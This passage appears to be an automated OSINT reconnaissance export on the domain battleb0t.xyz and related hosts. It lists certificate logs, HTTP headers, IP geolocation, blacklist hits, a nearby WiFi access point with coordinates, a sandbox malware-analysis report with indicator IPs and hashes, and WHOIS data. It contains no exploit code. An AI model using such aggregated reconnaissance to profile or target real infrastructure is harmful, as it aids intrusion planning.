u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.484', u'id': 9249459074}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.388', u'id': 9234809365}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:13.113', u'id': 9235878846}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:12.941', u'id': 9221147142}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.973', u'id': 9235401447}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.703', u'id': 9220770682}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.723', u'id': 9022375882}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.353', u'id': 8994750711}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.489', u'id': 9021136086}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.221', u'id': 9002142810}, {u'not_after': u'2023-06-21T22:37:04', u'not_before': u'2023-03-23T22:37:05', u'issuer_ca_id': 180753, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.battleb0t.xyz', u'serial_number': u'26cc7f01c692257813509e4880751557', u'entry_timestamp': u'2023-03-23T23:37:05.821', u'id': 8969484265}, {u'not_after': u'2024-03-21T23:59:59', u'not_before': u'2023-03-23T00:00:00', u'issuer_ca_id': 157938, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O="Cloudflare, Inc.", CN=Cloudflare Inc ECC CA-3', u'common_name': u'sni.cloudflaressl.com', u'serial_number': u'09cccb40358f10167bc737cb947e311a', u'entry_timestamp': u'2023-03-23T22:34:16.439', u'id': 8968494929}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.433', u'id': 8986351441}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.351', u'id': 8968126634}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.184', u'id': 8924480030}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.009', u'id': 8896621265}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.523', u'id': 8910975043}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.327', u'id': 8879939167}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.355', u'id': 8910971688}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.097', u'id': 8879934651}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.564', u'id': 8805533709}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.238', u'id': 8735518973}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.219', u'id': 8798937211}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.05', u'id': 8726555656}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.851', u'id': 8798923488}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.639', u'id': 8726539247}, {u'not_after': u'2023-05-14T15:23:50', u'not_before': u'2023-02-13T15: |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Giphy (Category: social)
https://giphy.com/channel/ayhu | ayhu |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vgB2xlauGELdj%2BVZddouVM4SLWiyGeZvDcjgyrNUJ4TCe9uwaasjv9pVNp9guo70Mwha6%2BIFTjO1Dq74W7EW2JKyrFRh0Oar6OFkdlmTZx5KugtXbII33uvqzZHNgPLMNucdvqQl"}],"group":"cf-nel","max_age":604800} | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "REVALIDATED", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"79120efbf2a0b92da044ff91335c99c1\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=vgB2xlauGELdj%2BVZddouVM4SLWiyGeZvDcjgyrNUJ4TCe9uwaasjv9pVNp9guo70Mwha6%2BIFTjO1Dq74W7EW2JKyrFRh0Oar6OFkdlmTZx5KugtXbII33uvqzZHNgPLMNucdvqQl\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f605ceb464381-EWR"} |
| 2023-05-12 03:11:20 | Physical Location | No | AbstractAPI | 0 | 0 | 3 | 0 | None | Frankfurt am Main, Hesse, 60313, Germany, Europe | 165.232.113.85 |
| 2023-05-12 03:01:31 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.59): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BJNPSETUP (Net ID: 00:00:85:EC:0F:F7) | 41.8781, -87.6298 |
| 2023-05-12 02:57:08 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 68, u'compromised_hosts': [u'35.229.48.116', u'35.229.48.116'], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'http://mysqldump.guru/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"mysqldump.guru"\n "x1.c.lencr.org"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_854_ConnHashTable<2132>_HashTable_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_854_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2132"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_854_IE_EarlyTabStart_0xc68_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_854_IESQMMUTEX_0_303"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_854_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "UpdatingNewTabPageData"\n "Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_854_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar8CD.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"35.229.48.116:80"\n "35.229.48.116:443"\n "184.31.135.120:80"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab8CC.tmp" has type "Microsoft Cabinet archive data 61745 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61745 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "Tar8CD.tmp" has type "data"- Location: [%TEMP%\\Tar8CD.tmp]- [targetUID: 00000000-00002208]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00002132]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002208]\n "Cab8CC.tmp" has type "Microsoft Cabinet archive data 61745 bytes 1 file"- Location: [%TEMP%\\Cab8CC.tmp]- [targetUID: 00000000-00002208]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._58ED487B-3D2F-11ED-9DB5-08002741DD17_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00002132]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00002208]\n "dnserror_1_" has type "HTML document UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "httpErrorPagesScripts_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "~DFF720781AB97005DE.TMP" has type "data"- Location: [%TEMP%\\~DFF720781AB97005DE.TMP]- [targetUID: 00000000-00002132]\n "~DF0A8CE01EE8BEF551.TMP" has type "data"- Location: [%TEMP%\\~DF0A8CE01EE8BEF551.TMP]- [targetUID: 00000000-00002132]\n "7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6]- [targetUID: 00000000-00002208]\n "ASZHC220.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ASZHC220.txt]- [targetUID: 00000000-00002208]\n "69C78A422A93F5B3CB1D3541A88DAA86" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\69C78A422A93F5B3CB1D3541A88DAA86]- [targetUID: 00000000-00002208]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00002132]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"mysqldump.guru" seems to be random'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://mysqldump.guru/"\n Pattern match: "http://mysqldump.guru"\n Heuristic match: "x1.c.lencr.org"\n Heuristic match: "GET / HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: x1.c.lencr.org"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/88 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-22', u'name': u'Uses a User Agent typical for browsers, although no browser was ever launched', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found user agent(s): Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-21', u'name': u'Malicious artifacts seen in the context of a contacted host', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found malicious artifacts related to "35.229.48.116": ...\n\n URL: https://htext.top/ (AV positives: 1/88 scanned on 09/26/2022 02:00:13)\n URL: http://goofy-brown-edae5e.netlify.app/ (AV positives: 9/88 scanned on 09/26/2022 01:45:05)\n URL: http://seovrggseo.netlify.app/distro-recommendation-for-mac.html (AV positives: 8/88 scanned on 09/26/2022 01:43:58)\n URL: http://v337546-yahoo-co-uk.netlify.app/ (AV positives: 15/88 scanned on 09/26/2022 01:40:17)\n URL: http://melanyrondon51.netlify.app/ (AV positives: 14/89 scanned on 09/26/2022 01:20:06)\n File SHA256: 78552f5436b9bf8f079510592f7d61c991abc31f687db116c76cda7b3d1de8dd (AV positives: 3/74 scanned on 09/16/2022 23:21:30)\n File SHA256: 7bc285600b6097490f580cbbf954c30b4b28f56e27f45bb03cbdeb5586089f0d (AV positives: 3/74 scanned on 09/16/2022 23:45:12)\n File SHA256: 230ad0dc3aad34538acddddc1b4af39a8ac95c43969cfde95caf1c07875e7c4d (AV positives: 23/75 scanned on 09/14/2022 23:23:07)\n File SHA256: e2751961ab69c5971a27f14e01f2fb4faca5f0817ec38fbe5c65cfa3fdd0e53a (AV positives: 20/74 scanned on 09/05/2022 15:20:03)\n File SHA256: 38bedee13bcb166766735d56317b1e49d580910c404c27ade070987cf3dc6d5f (AV positives: 25/74 scanned on 08/30/2022 00:15:34)'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-33', u'name': u'Malicious artifacts seen in the context of the input URL', u'attck_id_wiki': None, u'threat_level_human': u'malicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 2, u'type': 7, u'description': u'Found malicious artifacts related to the input domain "http://mysqldump.guru" (IP: 35.229.48.116): ...\n\n URL: https://htext.top/ (AV positives: | 35.229.48.116 |
| 2023-05-12 03:03:43 | Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | panel.battleb0t.xyz | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://panel.battleb0t.xyz', u'http_status': 301, u'plugins': {u'Country': {u'string': [u'UNITED STATES'], u'module': [u'US']}, u'HTTPServer': {u'string': [u'cloudflare']}, u'RedirectLocation': {u'string': [u'https://panel.battleb0t.xyz/']}, u'UncommonHeaders': {u'string': [u'report-to,nel,cf-ray,alt-svc']}, u'IP': {u'string': [u'104.21.71.14']}}}, {}] |
| 2023-05-12 03:01:26 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.249): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:08:54 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.71 | 34.74.170.74 |
| 2023-05-12 03:31:31 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 7 | 0 | None | c26pf75p2tc@networksolutionsprivateregistration.com | Domain Name: ONDIGITALOCEAN.COM
Registry Domain ID: 2280019987_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.networksolutions.com
Registrar URL: http://networksolutions.com
Updated Date: 2023-04-28T07:40:26Z
Creation Date: 2018-06-27T20:51:35Z
Registry Expiry Date: 2024-06-27T20:51:35Z
Registrar: Network Solutions, LLC
Registrar IANA ID: 2
Registrar Abuse Contact Email: abuse@web.com
Registrar Abuse Contact Phone: +1.8003337680
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: KIM.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: ONDIGITALOCEAN.COM
Registry Domain ID: 2280019987_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.networksolutions.com
Registrar URL: http://networksolutions.com
Updated Date: 2023-04-28T07:41:04Z
Creation Date: 2018-06-27T20:51:35Z
Registrar Registration Expiration Date: 2024-06-27T04:00:00Z
Registrar: Network Solutions, LLC
Registrar IANA ID: 2
Reseller:
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: PERFECT PRIVACY, LLC
Registrant Organization:
Registrant Street: 5335 Gate Parkway care of Network Solutions PO Box 459
Registrant City: Jacksonville
Registrant State/Province: FL
Registrant Postal Code: 32256
Registrant Country: US
Registrant Phone: +1.5707088622
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: c26pf75p2tc@networksolutionsprivateregistration.com
Registry Admin ID:
Admin Name: PERFECT PRIVACY, LLC
Admin Organization:
Admin Street: 5335 Gate Parkway care of Network Solutions PO Box 459
Admin City: Jacksonville
Admin State/Province: FL
Admin Postal Code: 32256
Admin Country: US
Admin Phone: +1.5707088622
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: c26pf75p2tc@networksolutionsprivateregistration.com
Registry Tech ID:
Tech Name: PERFECT PRIVACY, LLC
Tech Organization:
Tech Street: 5335 Gate Parkway care of Network Solutions PO Box 459
Tech City: Jacksonville
Tech State/Province: FL
Tech Postal Code: 32256
Tech Country: US
Tech Phone: +1.5707088622
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: c26pf75p2tc@networksolutionsprivateregistration.com
Name Server: KIM.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Registrar Abuse Contact Email: domain.operations@web.com
Registrar Abuse Contact Phone: +1.8777228662
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:15Z <<<
For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en
This listing is a Network Solutions Private Registration. Mail
correspondence to this address must be sent via USPS Express Mail(TM) or
USPS Certified Mail(R); all other mail will not be processed. Be sure to
include the registrant's domain name in the address.
The data in Networksolutions.com's WHOIS database is provided to you by
Networksolutions.com for information purposes only, that is, to assist you in
obtaining information about or related to a domain name registration
record. Networksolutions.com makes this information available "as is," and
does not guarantee its accuracy. By submitting a WHOIS query, you
agree that you will use this data only for lawful purposes and that,
under no circumstances will you use this data to: (1) allow, enable,
or otherwise support the transmission of mass unsolicited, commercial
